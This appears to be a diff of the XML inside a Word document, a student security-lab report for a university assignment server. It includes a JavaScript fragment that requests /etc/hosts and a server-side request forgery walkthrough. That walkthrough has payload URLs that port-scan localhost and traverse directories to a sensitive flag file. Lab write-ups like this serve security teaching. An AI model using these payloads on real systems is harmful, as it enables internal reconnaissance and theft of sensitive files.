+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("GET", "/etc/hosts");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14898,630 +17244,6 @@
                   <wp:extent cx="2623457" cy="1358244"/>
                   <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                   <wp:docPr id="8" name="Picture 8"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId24"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="2639658" cy="1366632"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="56" w:name="_Section_3_–"/>
-      <w:bookmarkStart w:id="57" w:name="_Toc71453351"/>
-      <w:bookmarkEnd w:id="56"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>S</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="57"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>The</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ollowing step shows </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>how</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to exploit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the server-side request forgery</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vulnerability</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to get the background checks information. Each payload is placed at the end of </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId25" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:eastAsia="zh-CN"/>
-          </w:rPr>
-          <w:t>http://assignment-hermes.unimelb.life/validate.php?web=</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="659"/>
-        <w:gridCol w:w="3872"/>
-        <w:gridCol w:w="4488"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="659" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>S</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>tep</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3872" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>P</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ayload</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4488" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>E</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xplanation</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="659" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3872" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="13"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="13"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="13"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:8873</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4488" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>P</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ort</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">scan the server till </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>the response changes.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BFA6951" wp14:editId="00A748C8">
-                  <wp:extent cx="2712720" cy="1213485"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
-                  <wp:docPr id="14" name="Picture 14"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId26"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="2712720" cy="1213485"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="659" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3872" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="14"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:8873</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:r>
-              <w:t>documents/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="14"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:8873</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:r>
-              <w:t>random/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="14"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-            </w:pPr>
-            <w:r>
-              <w:t>http://localhost:8873/documents/background-checks/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="14"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-            </w:pPr>
-            <w:r>
-              <w:t>http://localhost:8873/documents/background-checks/sensitive/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="14"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-            </w:pPr>
-            <w:r>
-              <w:t>http://localhost:8873/documents/background-checks/sensitive/flag.txt</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4488" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Traverse every directory and eventually we</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> will</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> leak out the sensitive information:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E6A05C9" wp14:editId="346CB9AD">
-                  <wp:extent cx="2712720" cy="556895"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="15" name="Picture 15"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -15541,6 +17263,631 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
+                            <a:ext cx="2639658" cy="1366632"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="56" w:name="_Section_3_–"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc71453351"/>
+      <w:bookmarkEnd w:id="56"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="57"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>The</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ollowing step shows </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>how</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to exploit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the server-side request forgery</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vulnerability</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to get the background checks information. Each payload is placed at the end of </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId28" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>http://assignment-hermes.unimelb.life/validate.php?web=</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="659"/>
+        <w:gridCol w:w="3872"/>
+        <w:gridCol w:w="4488"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="659" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tep</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3872" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ayload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4488" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>E</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xplanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="659" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3872" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4488" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
